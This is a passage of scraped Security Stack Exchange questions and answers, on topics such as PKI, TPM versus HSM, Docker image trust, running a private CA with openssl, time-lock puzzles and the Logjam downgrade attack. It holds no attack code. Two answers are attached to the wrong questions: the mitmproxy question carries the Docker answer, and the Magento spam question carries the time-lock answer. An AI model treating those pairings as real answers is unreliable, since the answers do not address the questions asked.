certificates at most. CA are very jealous of their power and won't issue certificates to just any wannabe intermediate CA. Whether that "CA power" is delegated is specified in the certificate. When a CA issues a certificate to a sub-CA, with that specific mark, it does so only within a heavy context (contracts, insurances, audits, and lots of dollars). Ultimately, trust is ensured through fear. Offending CA are severely punished. Nobody really has interest in breaking the system, since there is no readily available substitute. Note that, down the chain, the server S is verified to really own a specific public key, but nobody says that the server is honest. When you connect to https://www.wewillgraballyourmoney.com/ and see the iconic green padlock, the whole PKI guarantees you that you are really talking to that specific server; it does not tell you that sending them your credit card number would be a good idea. Moreover, all of this is association between the server name as it appears in the target URL and a public key. This does not extend to the name intended by the user , as that name lives only in the user's brain. If the user wants to connect to www.paypal.com but really follows a URL to www.paaypaal.com , then the PKI and the browser will in no way be able to notice that the user really wanted to talk to PayPal, and not another server with a roughly similar (but not identical) name. The main use case for a PKI is distributing public keys for lots of entities. In the case of Web browsers and SSL, the browser user must be able to check that the server he tries to talk to is indeed the one he believes it to be; this must work for hundreds of millions of servers, some of which having come to existence after the browser was written and deployed. Reducing that problem to knowing a hundred root CA keys makes it manageable, since one can indeed include a hundred public keys in a Web browser (that's a million times easier than including a hundred million public keys in a Web browser). Client certificates are a SSL-specific feature. In all of the above we talked about a SSL client (Web browser) trying to authenticate a SSL server (Web server with HTTPS). SSL additionally supports the other direction: a SSL server who wants to make sure that it talks to a specific, named client. The same mechanism can be used, with certificates. An important point to notice is that the server certificate and the client certificate live in different worlds. The server certificate is validated by the client. The client certificate is validated by the server. Both validations are independent of each other; they are performed by distinct entities, and may use distinct root CA. The main reason why SSL servers have certificates is because clients cannot possibly know beforehand the public keys of all servers: there are too many of them, and new ones are created with every passing minute. On the other hand, when a server wants to authenticate a client, this is because that client is a registered user . Usually, servers know all their users, which is why most can use a simpler password-based authentication mechanism. SSL client certificates are thus rather rare in practice, because the main advantage of certificates (authenticating entities without prior knowledge) is not a feature that most servers want.
{ "source": [ "https://security.stackexchange.com/questions/87564", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52676/" ] }
88,744
TPM (Trusted Platform Module) and HSM (Hardware Security Module) are considered as cryptoprocessor, but what are the differences exactly? Does one of them has more advantages than another?
Trusted Platform Modules A Trusted Platform Module (TPM) is a hardware chip on the computer’s motherboard that stores cryptographic keys used for encryption. Many laptop computers include a TPM, but if the system doesn’t include it, it is not feasible to add one. Once enabled, the Trusted Platform Module provides full disk encryption capabilities. It becomes the "root of trust" for the system to provide integrity and authentication to the boot process. It keeps hard drives locked/sealed until the system completes a system verification, or authentication check. The TPM includes a unique RSA key burned into it, which is used for asymmetric encryption. Additionally, it can generate, store, and protect other keys used in the encryption and decryption process. Hardware Security Modules A hardware security module (HSM) is a security device you can add to a system to manage, generate, and securely store cryptographic keys. High performance HSMs are external devices connected to a network using TCP/IP. Smaller HSMs come as expansion cards you install within a server, or as devices you plug into computer ports. One of the noteworthy differences between the two is that HSMs are removable or external devices. In comparison, a TPM is a chip embedded into the motherboard. You can easily add an HSM to a system or a network, but if a system didn’t ship with a TPM, it’s not feasible to add one later. Both provide secure encryption capabilities by storing and using RSA keys. Source: https://blogs.getcertifiedgetahead.com/tpm-hsm-hardware-encryption-devices/
{ "source": [ "https://security.stackexchange.com/questions/88744", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22061/" ] }
88,790
When it comes to Docker, it is very convenient to use a third party container that already exist to do what we want. The problem is that those containers can be very complicated and have a large parent tree of other containers; they can even pull some code from repositories like GitHub. All of this is making a security audit harder. I know it could sound naive, but could it be easy for someone to hide some malicious content in a container? I know that the answer is YES but I would like to know in which dimension, and if it's worth the risk. I'm a familiar with GitHub, and I usually take a look at the source-code when I use third party code (unless it's a well known project.) I am wondering if the community is watching for those kinds of behavior because the harm of a malicious container could be bigger than malicious code. How likely is a container to be malicious? (Considering it's a popular one.) As well, what dimensions could damage/use the other components of the underlining system or the others systems on the LAN ? To be even simpler, should I trust them? Edit: I found an article from Docker that brings a bit of light in Docker security and best practices: Understanding Docker security and best practices .
At the moment there is no way to easily work out whether to trust specific docker containers. There are base containers provided by Docker and OS providers which they call "trusted" but the software lacks good mechanisms as yet (e.g. digital signing) to check that images haven't been tampered with. For clarification to quote the recently released CIS security standard for docker section 4.2 Official repositories are Docker images curated and optimized by the Docker community or the vendor. But,the Docker container image signing and verification feature is not yet ready. Hence, the Docker engine does not verify the provenance of the container images by itself. You should thus exercise a great deal of caution when obtaining container images. When you get into the world of general 3rd party containers from Docker hub, the picture is even trickier. AFAIK docker do no checking of other peoples container files, so there's a number of potential problems The container contains actual malware. Is this likely, no one knows. Is it possible, yes. The container contains insecure software. Dockerfiles are basically like batch scripts that build a machine. I've seen several that do things like download files over unencrypted HTTP connections and then run them as root in the container. For me that's not a good way to get a secure container The container sets an insecure settings. Docker is all about automating set-up of software which means that you are, to an extent, trusting all the people who made the dockerfiles to have configured them as securely as you would have liked them to. Of course you could audit all the dockerfiles, but then once you've done that you'd almost have been better just configuring the thing yourself ! As to whether this is "worth the risk", I'm afraid that's a decision only you can really make. You are trading off the time needed to develop and maintain your own images, against the increased risks that someone involved in the production of the software you download will either be malicious or have made a mistake with regards to the security of the system.
{ "source": [ "https://security.stackexchange.com/questions/88790", "https://security.stackexchange.com", "https://security.stackexchange.com/users/26244/" ] }
88,799
I am using mitmproxy to intercept HTTPS connections from my client device to a third party server. In order for mitmproxy to intercept SSL requests, I need to install a trusted root certificate on my device. Is there a way for the server to know that requests have been intercepted? Can the server see the details of the custom root certificate? For example if the name is "mitmproxy", can the server see that?
At the moment there is no way to easily work out whether to trust specific docker containers. There are base containers provided by Docker and OS providers which they call "trusted" but the software lacks good mechanisms as yet (e.g. digital signing) to check that images haven't been tampered with. For clarification to quote the recently released CIS security standard for docker section 4.2 Official repositories are Docker images curated and optimized by the Docker community or the vendor. But,the Docker container image signing and verification feature is not yet ready. Hence, the Docker engine does not verify the provenance of the container images by itself. You should thus exercise a great deal of caution when obtaining container images. When you get into the world of general 3rd party containers from Docker hub, the picture is even trickier. AFAIK docker do no checking of other peoples container files, so there's a number of potential problems The container contains actual malware. Is this likely, no one knows. Is it possible, yes. The container contains insecure software. Dockerfiles are basically like batch scripts that build a machine. I've seen several that do things like download files over unencrypted HTTP connections and then run them as root in the container. For me that's not a good way to get a secure container The container sets an insecure settings. Docker is all about automating set-up of software which means that you are, to an extent, trusting all the people who made the dockerfiles to have configured them as securely as you would have liked them to. Of course you could audit all the dockerfiles, but then once you've done that you'd almost have been better just configuring the thing yourself ! As to whether this is "worth the risk", I'm afraid that's a decision only you can really make. You are trading off the time needed to develop and maintain your own images, against the increased risks that someone involved in the production of the software you download will either be malicious or have made a mistake with regards to the security of the system.
{ "source": [ "https://security.stackexchange.com/questions/88799", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76104/" ] }
88,815
I noticed that the new gmail login asks for username first, and then confirms if such username exists, before asking for password input. Does this not go against conventional security wisdom to not divulge information about whether an username exists, to thwart the class of attacks that tries many possible usernames? I assume Google knows what they are doing, so does this mean they have some way to be secure against what is conventionally considered a vulnerability?
For smaller sites, you don't want to allow hackers to enumerate your user lists, but for Google, the site is so large, one can assume almost everyone has an account or several accounts. So, the risk is minimized after a threshold of ubiquity. It is still a good idea for most sites to not disclose whether a username exists, but the risk needs to be weighed against the new user registration process. What you want to prevent is an automated process from enumerating your lists. The new user registration process should include some form of delay or gate so that a script can't rapidly try a dictionary of users. This is often achieved by sending an email with the results of the un/successful registration process. Yes, one could still enumerate, but there is a delay and an additional step. Another thing to consider is the difference between a public site and a private site. Google is a public service an usernames are also public (disclosed with every email sent by an account). On the other hand, an internal corporate site, where only current employees can access, is private, and requires more stringent controls to prevent enumeration.
{ "source": [ "https://security.stackexchange.com/questions/88815", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76117/" ] }
88,853
When you connect to an open wireless network (that is, a wireless network without any symmetric password set) is there any sort of secure key exchange going on, or is data sent back and forth unencrypted and able to be intercepted by anyone "listening"?
Yep. Open wireless networks are entirely unencrypted; anyone can see all the data you send (even if they aren't connected to the network).
{ "source": [ "https://security.stackexchange.com/questions/88853", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38377/" ] }
88,863
On a Windows 8.1 Pro PC without TPM, how can I use Bitlocker with both a startup USB drive and password? I don't have the option to use both of them, is this possible via command line? Currently, using Bitlocker with TPM and a startup USB and password is possible, so it should be possible with a startup USB drive and password but no TPM.
This guide explains it quite well, although consider following the steps below rather than downloading and running .reg files from the internet. One can turn on Bitlocker without TPM but has to modify the registry in order to allow this, as this isn't what Microsoft originally planned as the drive won't be bound to the computer any longer. For company's convenience this option was added but hidden. Steps: Open the group policy editor (gpedit.msc) as admin. Go into the "directoy" (left sub-window) "Computer Configuration/Administrative Templates/ Windows Components/ BitLocker Drive Encryption/ Operating System Drives" Open the "Require additional authentification at startup" entry (right sub-window) Set the radio box to "enabled" and check "Allow Bitlocker without a compatible TPM" Optional: Change the cipher strength (128 or 256 bit, difference: 128 is secure for ~50 years and 256 for ~200 years) using the "folder" directly above ("BitLocker Drive Encryption") and the "Choose drive encryption method and cipher strength" entry. Check the enabled and choose your cipher in the dropdown menu. Encrypt your drive as you normally would. It seems like USB + PIN is not an option any longer in Windows 8 :(
{ "source": [ "https://security.stackexchange.com/questions/88863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76152/" ] }
88,947
Since laptop and other electronic device seizures at US borders became legal without a warrant (including making copies of data), 7% of ACTE's business travelers reported being subject to a seizure as far back as February 2008 . What measures have IT departments taken since to protect sensitive corporate data, and are there any estimates of their (aggregate or individual) costs? I've only found this article about the economic costs of laptop seizure, but no figures are mentioned.
The ANSSI , French government service in charge of IT security, has published a document providing brief advice to people having to travel abroad. Relevant here are the advisories concerning preparation before travel: Review the applicable company policy, Review destination country applicable laws, Prefer to use devices dedicated to travel (computers, smartphones, external storage etc.) and not containing any data not strictly needed for the mission, Backup all of your data before leaving and keep the backup in a safe place, Avoid taking any sensitive data at all , prefer to use a VPN (or a specially set up secured mailbox where all data will be deleted after retrieval) to retrieve the data securely (this is one of the most on-topic pieces of advice, since this one prevents any sensitive data from being present on the computer when crossing the border), Use a screen filter to avoid shoulder surfing during travel, Apply a distinctive sign on the computer and accessories (like a sticker, do not forget to put one on the computer bag) to facilitate tracking and avoid any accidental exchange. The linked document then goes on with other advice concerning the rest of the trip but this is less relevant regarding the current topic. Sorry to provide French documents as a source, but the ANSSI is an authoritative source in France and I felt it could be a worthy addition to this discussion since these advisories seem to properly address the question. Edit: As some comments and the very useful answer from Spehro Pefhany below pointed out, there are two other things which should be noted: If your computer is seized, if you are requested ciphering keys and password, do not put up any resistance since it may lead you into legal trouble (I suppose you are traveling with some sort of mission, it would be too bad for the mission to be canceled because you were not in measure to attend the meeting or respect some contractual engagements. Customs may have plenty of time, you may not.) However, immediately inform your company IT staff and managers so due actions can be taken (revoking corresponding accesses, passwords, certificates, etc.) and discuss the issue with them to determine the way to proceed since the seized then returned devices may not be trustable anymore (impact and mitigation directly depends on the nature of the mission). Customs are a two way passage. When preparing your luggage for the return travel, ensure that you have properly cleaned up you devices (again, not only the laptop: all devices including cellphones, external storage, etc.): send your data to your company (in a ciphered form, again either using a VPN or a secured one-time email account) then wipe the files using appropriate software, delete browser's history/cache/cookies, delete OS temporary files, delete call, messages and voicemail history, delete information about used networks (Wifi accesses, proxies, etc.). And while I'm at it, good advice for the traveler: Be careful when you are offered any external media like a USB key or a CD. Be careful too when exchanging documents with other people using writeable external media (as a reminder, the write protection on SD-cards is software only and therefore cannot be trusted), Do not plug your cellphone into the free public USB chargers, which are becoming more and more frequent in places like airports, No matter if your devices have been seized or not, do not plug them back on your company network unless they got at the very least a thorough check. At your return change all passwords which were used during your travel.
{ "source": [ "https://security.stackexchange.com/questions/88947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10820/" ] }
88,984
Many password-based encryption utilities (e.g.: KeePass, TrueCrypt) do something along the lines of... Encrypt data with super-strong random-generated key, "data key". Encrypt data key with another key, "user key", based on user-provided password. When access is needed, user provides password. Password is used to recreate user key, which decrypts data key, which decrypts the data. Presumably the logic behind that is this: User-provided passwords suck, so we need a better key to protect the data. Users still need access to the data, so we need a way for them to do it with a password. However, the bottom line of all this is that the protection of the data still boils down to the strength and protection of the user-provided password. So, what's the real point of the extra overhead in having a separate key involved?
The main advantage of using an intermediate key is that is allows changing your password without reprocessing all the data. E.g. you have a big file (gigabytes...) encrypted with random key K (a 128-bit value), and K is itself encrypted with P (the key derived from the password). If you change your password, you get a new password-derived key P' . To adjust things, you must then decrypt K with P and reencrypt it with P' . This does not require reencrypting or even accessing the big file. Apart from that advantage, using an intermediate key decouples the operation, which is more flexible. For instance, the process used to turn the password into a symmetric key might not be up to the task of producing a key of the length you want for bulk encryption (for instance, bcrypt will produce a 192-bit key, not a 256-bit key). Another advantage of the intermediate key is that it allows revealing files. For instance, you have your big file, and you want to show it to Bob. But you do not want to give your password to Bob; you want Bob to be able to see that single file, not all other files which are morally encrypted with the same password. With the intermediate key, this is easy: you just show K to Bob. As long as each file has its own random K , this works. Note that the model extends to asymmetric encryption: a file sent to n recipients will be encrypted once with a random key K , and K will be encrypted with the public keys of each recipient. This is how things work in OpenPGP . The corresponding advantages map to the password-based situation as well.
{ "source": [ "https://security.stackexchange.com/questions/88984", "https://security.stackexchange.com", "https://security.stackexchange.com/users/953/" ] }
89,004
I have read about SSL and TLS; I know how RSA works and why digital certificates are necessary (more or less), but I am curious about how we prevent a fake digital certificate. The operating system comes with some certificates pre-installed, but how can we be certain that the certificates have not been changed in our computer by a virus? If a virus changed the local certificates, and I access a website that sends me a fake digital certificate that matches the fake one on my computer, what will happen? I may be confused about how this works. I would appreciate a detailed explanation.
Certificates are signed and the cryptographic signature is verified; if the signature matches then the certificate contents are exactly as they were when the certificate was signed. This, of course, does not solve the problem, it merely moves it around. The complete structure is called a PKI . The certificates which are preinstalled in your computer (came with the OS or the browser) are the root CA certificates , i.e. the public keys that you know "a priori" and from which you begin all the signature verification process. To make the story short, if some hostile entity could insert a rogue root CA in your computer, then you lose. Of course, under the same conditions, the same hostile attacker (e.g. a virus) could alter the code of the browser and hijack your data from that, or log all your key strokes, or more generally completely bamboozle you in a zillion ways. When a virus executes on your computer, you are already beyond redemption. Inserting a fake root CA is, in fact, a rather poor way to attack people, because they may notice it. Injecting a data snooper right inside the entrails of the browser does not require much additional effort, can be done within the same conditions, and results in a much more complete and discreet destruction of your security.
{ "source": [ "https://security.stackexchange.com/questions/89004", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76305/" ] }
89,094
Are there any cryptographic schemes/protocols that would allow me to encrypt a file, make it publicly available, but ensure that it can only be decrypted after specific date? I assume it would be almost impossible without a trusted authority (notary). Or is there some way? I was inspired by the idea of "secure triggers" , which is a scheme to decrypt data after a specific event has happened. But this "trigger event" is only known to the author. In contrast, I am interested in a cryptographic scheme that would enable decryption of data at (or after) a specific date which is publicly known.
Time is relative. Cryptography lives in the ethereal world of abstract computing machines: there are machines that can do operations. Bigger machines can do operations faster. There is no clock that you can enforce; physical time has no meaning. In other words, if an attacker wants to get your file earlier, he just has to buy a faster computer. Now one can still make an effort. You may be interested in time-lock puzzles . The idea is to be able to make a problem instance that is easy to build but expensive to open, where the cost is configurable. The solution found by Rivest, Shamir and Wagner (to my knowledge, this is the only practical time-lock puzzle known so far) works like this: Generate a random RSA modulus n = pq where p and q are big primes (and also p = 3 mod 4, and q = 3 mod 4). Generate a random x modulo n . For some integer w , define e = 2 w , and compute y = x e mod n . Hash y with some hash function, yielding a string K that you use as key to encrypt the file you want to time-lock. Publish x , n , w and the encrypted file. Discard p , q , y and K . The tricky point is that computing y , in all generality, has a cost which is proportional to w : it is a succession of w modular squarings. If w is in the billions or more range, then this is going to be expensive. However, when the p and q factors are known, then one can compute e modulo p-1 and q-1 , which will be a lot shorter, and the computation of y can be performed within a few milliseconds. Of course this does not guarantee a release at a specific date ; rather, it guarantees a minimum effort to unlock the puzzle. Conversion between effort and date depends on how hard attackers try... The time-lock puzzle expressed above has some nice characteristics, in particular being impervious to parallelism. If you try to break one such puzzle and you have two computers, you won't get faster than what you could do with a single computer. In a somewhat similar context, this time-lock puzzle is used in the Makwa password hashing function , candidate to the ongoing PHC . In password hashing, you want a configurable opening effort (albeit within a much shorter time frame, usually less than a second).
{ "source": [ "https://security.stackexchange.com/questions/89094", "https://security.stackexchange.com", "https://security.stackexchange.com/users/28654/" ] }
89,101
I have a headache with my shop using Magento, my shop is very vulnerable to hacking by bots or other people. They often add some scripts and files to sending spam mails. I think they come to me from old files, so I try to update all addons and Wordpress (integrated with Magento). I update all without Magento files I got 1.8 CE version. I try to keep safe my shop using some security tricks from some blogs which I found. When I did it I think it's end of my problems!! But today I open mail from my host provider with call that my server sent a lot of spam. There is some ways to secure my shop to future attacks? What do I have to do when I clean up my shop?
Time is relative. Cryptography lives in the ethereal world of abstract computing machines: there are machines that can do operations. Bigger machines can do operations faster. There is no clock that you can enforce; physical time has no meaning. In other words, if an attacker wants to get your file earlier, he just has to buy a faster computer. Now one can still make an effort. You may be interested in time-lock puzzles . The idea is to be able to make a problem instance that is easy to build but expensive to open, where the cost is configurable. The solution found by Rivest, Shamir and Wagner (to my knowledge, this is the only practical time-lock puzzle known so far) works like this: Generate a random RSA modulus n = pq where p and q are big primes (and also p = 3 mod 4, and q = 3 mod 4). Generate a random x modulo n . For some integer w , define e = 2 w , and compute y = x e mod n . Hash y with some hash function, yielding a string K that you use as key to encrypt the file you want to time-lock. Publish x , n , w and the encrypted file. Discard p , q , y and K . The tricky point is that computing y , in all generality, has a cost which is proportional to w : it is a succession of w modular squarings. If w is in the billions or more range, then this is going to be expensive. However, when the p and q factors are known, then one can compute e modulo p-1 and q-1 , which will be a lot shorter, and the computation of y can be performed within a few milliseconds. Of course this does not guarantee a release at a specific date ; rather, it guarantees a minimum effort to unlock the puzzle. Conversion between effort and date depends on how hard attackers try... The time-lock puzzle expressed above has some nice characteristics, in particular being impervious to parallelism. If you try to break one such puzzle and you have two computers, you won't get faster than what you could do with a single computer. In a somewhat similar context, this time-lock puzzle is used in the Makwa password hashing function , candidate to the ongoing PHC . In password hashing, you want a configurable opening effort (albeit within a much shorter time frame, usually less than a second).
{ "source": [ "https://security.stackexchange.com/questions/89101", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76386/" ] }
89,108
Let's say I create a microsite for a client that contains confidential business information. We need to place this in a location the client can access, in order for them to approve for launch. If we place this microsite behind a login, we have a guarantee noone can just stumble across the content and compromise it. But, what if we publish it to an undisclosed, unindexed directory with a name of the same "strength" as the aforementioned password? For the sake of argument, "undisclosed and unindexed" means it won't be manually or automatically linked to/from anywhere, or indexed by any website search on the same domain. It also won't be placed in it's own subdomain, so DNS crawling is not a concern. My initial instinct says this is simply security by obscurity, and is much less secure due to the possibility of someone just stumbling over it. But, after thinking about it, I'm not so sure. Here's my understanding: Even using a dictionary-weak, two-word string for both the password and the URL, there are still billions of guessable options. Placing it in the URL doesn't magically reduce that list. Login pages can have brute-force protection, so an attacker would get optimistically 20 attempts to guess. URL guessing would have to be caught by the server's DoS or spam protection, and may allow 200 404-producing guesses if you're anticipating an attack - still not statistically significant to billions of options. The login page is linked from a website - it's a visible wall for an attacker to beat on. It's evidence that something exists worth attacking for. Guessing the URL, however, is blind. It requires being on the right domain (and subdomain), and operating on faith that, even after tens of thousands of incorrect guesses, you're still going to turn something up. The URL has an extra susceptibility to being index/spidered externally. However, most respectable spiders don't "guess" at sites, they just follow links. A malicious "guessing" spider would be caught by the same DoS/spam protection as point 2. From what I can tell, the only meaningful difference between the two is imagined peace of mind. The possibility that the URL can be stumbled over makes people nervous, and the login makes things feel secure, despite them seeming comparable based on the points above. The URL option still feels like it should be much less secure, though. What am I failing to consider? EDIT: A lot of valid human-error concerns popping up. This question was inspired by a client that implements a degree of human-proofing security - vpn login via keyfob, screen dimmers, 5min sleep timeouts, social media blackout, etc. For this question, please assume no public-network access and no incidental breaches like shoulder-watching or "oops! I posted the link to twitter!". I'm looking for a more systematic answer, or at least one more satisfying than "humans screw up". EDIT 2: Thanks for pointing out the possible duplicate . IMHO, I think each has a value as an individual question. That question addresses image security specifically, and delves into alternate methods of securing and encoding that data (eg base64 encoding). This question more specifically addresses the concept of secrecy vs obscurity, and applies it to why a login is better than a URI independent of the type of data in question. Furthermore, I don't think the accepted answer there explains my particular question as deeply or thoroughly as @SteveDL's great answer below.
I'll extend on one point at a slightly more abstract level about why public authenticated spaces are preferable to hidden unprotected spaces. The other answers are all perfectly good and list multiple attacks one should know better to avoid. Everyone with formal training should've heard at some point of the Open Design security principle . It states that systems must not rely on details of their design and implementation being secret for their functioning. What does that tell us about secret passwords vs. secret URLs? Passwords are authentication secrets. They are known by a challenged entity that provides them to a challenging entity in order to authenticate. Both parties need a form of storage, and a communication channel. Stealing the password requires compromising either of the three. Typically: The user must be trapped or forced into revealing the password The server must be hacked into so that it reveals a hashed version of the password The confidentiality of the channel between the user and the server must be compromised Note that there are plenty of ways for authentication to be toughened, starting by adding an additional authentication factor with different storage requirements and transmission channels, and therefore with different attack channels (Separation of Privileges principle). We can already conclude that obscure URLs cannot be better than passwords because in all attack vectors on passwords, the URL is either known (2 and 3) or obtainable (1). Obscure URLs on the other hand are manipulated much more commonly. This is in large part due to the fact that multiple automated and manual entities in the Internet ecosystem process URLs routinely. The secrecy of the URL relies on it being hidden in plain sight , meaning it must be processed by all these third-parties just as if it were a public, already-known commodity, exposing it to the eyes of all. This leads to multiple issues: The vectors through which these obscure URLs can be stored, transmitted and copied are much more numerous Transmission channels are not required to be confidentiality-protected Storage spaces are not required to be confidentiality or integrity protected, or monitored for data leakage The lifetime of the copied URLs is by and large out of the control of the original client and server principals In short, all possibilities of control are immediately lost when you need that a secret be treated openly. You should only hide something in plain sight if it is impossible for third-parties to make sense of that thing. In the case of URLs, the URL can only be functional in the whole Internet ecosystem (including your client's browser, a variety of DNS servers and your own Web server) if it can be made sense of, so it must be kept in a format where your adversaries can use it to address your server. In conclusion, respect the open design principle.
{ "source": [ "https://security.stackexchange.com/questions/89108", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76384/" ] }
89,319
I need to create my own CA for an intranet and unfortunately it seems there's no good answer about this on Security.SE. There are many resources online about this, but all of them are different and some use outdated defaults (MD5/SHA1, etc) which doesn't seem that trustworthy. There are also hundreds of different variations of openssl.cnf , ranging from a 10-line file to the enormous one that came by default with my distribution. I would like a canonical answer about setting up a simple CA for issuing server certs and client certs. Apparently it seems some people still don't understand that I'm not some large company where a CA compromise causes billions worth of losses and can't be mitigated easily so let me explain a bit better why I need the CA : multiple servers connected via insecure links (the Internet) need to communicate securely. I need a way to identify myself to those servers in order to perform administrative tasks, without going back and forth to my password manager every 10 seconds. no other CAs than mine should be able to impersonate any of the servers, no matter how unlikely ( but possible ) that is. There. My own PKI and a cert installed on each machine seems to fit the needs perfectly. One of the software I use also requires the use of a PKI, so just using self-signed certificates isn't an option. To compromise the PKI someone would need to compromise my work machine, and if that's done then the attacker can already do quite a bit of damage without even touching the PKI (as I would be logging in via SSH to the server from this machine anyway). That is a risk I'm accepting to take, and this PKI doesn't add any more risk than what there is already.
If your infrastructure is tiny , much of the details of running a CA (e.g. CRLs and such) can probably be ignored. Instead, all you really have to worry about is signing certificates. There's a multitude of tools out there that will manage this process for you. I even wrote one many years ago. But the one I recommend if you want something really simple is easy-rsa from the OpenVPN project. It's a very thin wrapper around the OpenSSL command-line tool. If you're going to be managing a LOT of certificates and actually dealing with revocation and stuff, you'll want a much more complex and feature-complete utility. There are more than enough suggestions already provided, so instead I'll just stick with the basics of what you're trying to accomplish. But here's the basic procedure. I'll explain it with OpenSSL, but any system will do. Start by creating your "root" CA -- it'll be a self-signed certificate. There are several ways to do this; this is one. We'll make ours a 10-year cert with a 2048-bit key. Tweak the numbers as appropriate. You mentioned you were worried about hashing algorithm, so I added -sha256 to ensure it's signed with something acceptable. I'm encrypting the key using AES-256, but that's optional. You'll be asked to fill out the certificate name and such; those details aren't particularly important for a root CA. # First create the key (use 4096-bits if that's what floats your boat) openssl genrsa -aes256 -out root.key 2048 # Then use that key to generate a self-signed cert openssl req -new -x509 -key root.key -out root.cer -days 3652 -sha256 If you encrypted the key in the first step, you'll have to provide the password to use it in the second. Check your generated certificate to make sure that under "Basic Constraints" you see "CA: TRUE". That's really the only important bit you have to worry about: openssl x509 -text < root.cer Cool. OK, now let's sign a certificate. We'll need another key and this time a request. You'll get asked about your name and address again. What fields you fill in and what you supply is up to you and your application, but the field that matters most is the "Common Name". That's where you supply your hostname or login name or whatever this certificate is going to attest. # Create new key openssl genrsa -aes256 -out client1.key 2048 # Use that key to generate a request openssl req -new -key client1.key -out client1.req # Sign that request to generate a new cert openssl x509 -req -in client1.req -out client1.cer -CA root.cer -CAkey root.key -sha256 -CAcreateserial Note that this creates a file called root.srl to keep our serial numbers straight. The -CAcreateserial flag tells openssl to create this file, so you supply it for the first request you sign and then never again. And once again, you can see where to add the -sha256 argument. This approach -- doing everything manually -- is in my opinion not the best idea. If you're running a sizable operation, then you'll probably want a tool that can keep track of all your certificates for you. Instead, my point here was to show you that the output you want -- the certificates signed the way you want them -- is not dependent on the tools you use, but rather the options you provide to those tools. Most tools can output a wide variety of configurations, both strong and weak, and it's up to you to supply the numbers you deem appropriate. Outdated defaults are par for the course.
{ "source": [ "https://security.stackexchange.com/questions/89319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
89,383
In the SSL handshake both the client and server generate their respective random numbers. The client then generates a pre master secret and encrypts it with the server's public key. However, why can't the client just generate the pre master secret and send that to the server? Why do we need a client and server random? Is it to contribute to the entropy in the master secret, or for uniformity with other key exchange algorithms such as DH?
From The First Few Milliseconds of an HTTPS Connection : The master secret is a function of the client and server randoms. master_secret = PRF(pre_master_secret, "master secret", ClientHello.random + ServerHello.random) Both the client and the server need to be able to calculate the master secret. Generating a pre-master secret on the client and just sending that to the server would mean the the client never gets to find out the master secret. Why not just use the pre-master? This would mean that the entire key generation routine was based on client generated values. If a Man-In-The-Middle attacker replayed the handshake, the same pre-master secret would be sent and then used for the connection. Having the server generate a random value ( ServerHello.random ) will mean that the MAC secret is different if the ClientHello.random is repeated, and therefore the MAC and encryption keys will be different, preventing any replay attack .
{ "source": [ "https://security.stackexchange.com/questions/89383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76655/" ] }
89,642
If my website is targeted for a DDoS attack after I have been paid for completing the website, and I get an angry phone call from the client regarding outage of service, what do I do? It hasn't actually happened yet, but the idea haunts me.
The following is all hypothetical: First off you should NEVER sign a SLA in this case, or guarantee any uptime whatsoever. (you are delivering a website, not the service to host that) Secondly, a hosting company should be used who can defend against a DoS attack in some way. (be aware of SLA's and their limitations) You need to think of yourself in the same way a plumber does. The plumber is not responsible for your water service, just for leaks and work on the pipes. A DDoS would be like an over pressure on the water lines (like a 1000 times more than they are designed for) and the fact that the pipes break then is not the plumber's fault but the water company's. All the plumber can do is fix it after the water has been turned off.
{ "source": [ "https://security.stackexchange.com/questions/89642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76855/" ] }
89,689
I heard there is a "new" TLS vulnerability named Logjam , what does it do and how do I prevent it?
TL;DR SSL/TLS client and server agree to use some weak crypto. Well, turns out that weak crypto is weak . In Detail When an SSL/TLS protocol is performed, the client sends a list of supported cipher suites, and the server chooses one. At the end of the initial handshake, some Finished messages are exchanged, and encrypted/protected with the newly negotiated crypto algorithms, and the contents of these messages is a hash of all the preceding messages. The idea is that an active attacker (a MitM attack ) could try to manipulate the list of cipher suites sent by the client to remove all "strong" crypto suites, keeping only the weakest that both client and server support. However, this would break the Finished messages. Thus, these messages are meant (among other roles) to detect such downgrade attacks . In theory, it's fine; unless the client and server both support a cipher suite that is so weak that the MitM attacker can break it right away , unravel the whole crypto layer, and fix a Finished message in real time. Which is what happens here. In Even More Detail When using the "DHE" cipher suites (as in "Diffie-Hellman Ephemeral"), the server sends the "DH parameters" (modulus and generator) with which client and server will perform a Diffie-Hellman key exchange . Furthermore, the server signs that message with its private key (usually an RSA key, since everybody uses RSA in practice). The client verifies that signature (the public key is the one in the server certificate), then proceeds to use the DH parameter to complete the key exchange. It so happens that in the previous century, there were some rather strict US export regulations on crypto, and this prompted "export cipher suites", i.e. weak crypto that was compatible with these regulations. Many SSL servers still support these "export cipher suites". In particular, some cipher suites that use DHE and mandate a DH modulus of no more than 512 bits. Moreover, most SSLs in the servers use the same modulus, because using the one provided with the SSL library is easier than generating your own. Reusing the same modulus as everybody else is not a big issue; DH tolerates that just fine. However, it means that if an attacker invests a lot of computations in breaking one DH instance that uses a given modulus p , the same attacker can reuse almost all of the work for breaking other instances that use the same modulus p . So the attack runs like this: Attacker is in the MitM position; where he can modify data flows in real time, Attacker alters the list of cipher suites sent by the client to specify the use of an export DHE cipher suite, The server complies and sends a 512-bit modulus p , The client is still persuaded that it is doing a non-export DHE, but a DH modulus is a DH modulus, so the client accepts the weak/export modulus from the server just fine, Attacker uses his pre-computations on that value p to break the DH in real time and fix the Finished messages. The Logjam article authors call this a "protocol flaw" because the ServerKeyExchange message that contains the export DH parameters is not tagged as "for export", and thus is indistinguishable (save for the modulus length) from a ServerKeyExchange message that contains non-export DH parameters. However, I would say that the real flaw is not there; the real problem is that the client and server accept to use a 512-bit DH modulus even though they both know that it is weak. What should you do? Well, the same thing as always: install patches from your software vendors. As a matter of fact, this should go without saying. On the client side, Microsoft has already patched Internet Explorer to refuse to use a too small modulus. A fix for Firefox in the form of a plugin by Mozilla is available here now. It is expected that other browser vendors (Opera, Chrome...) will soon follow. On the server side, you can explicitly disable support for "export" cipher suites, and generate your own DH parameters. See that page for details. Note that IIS 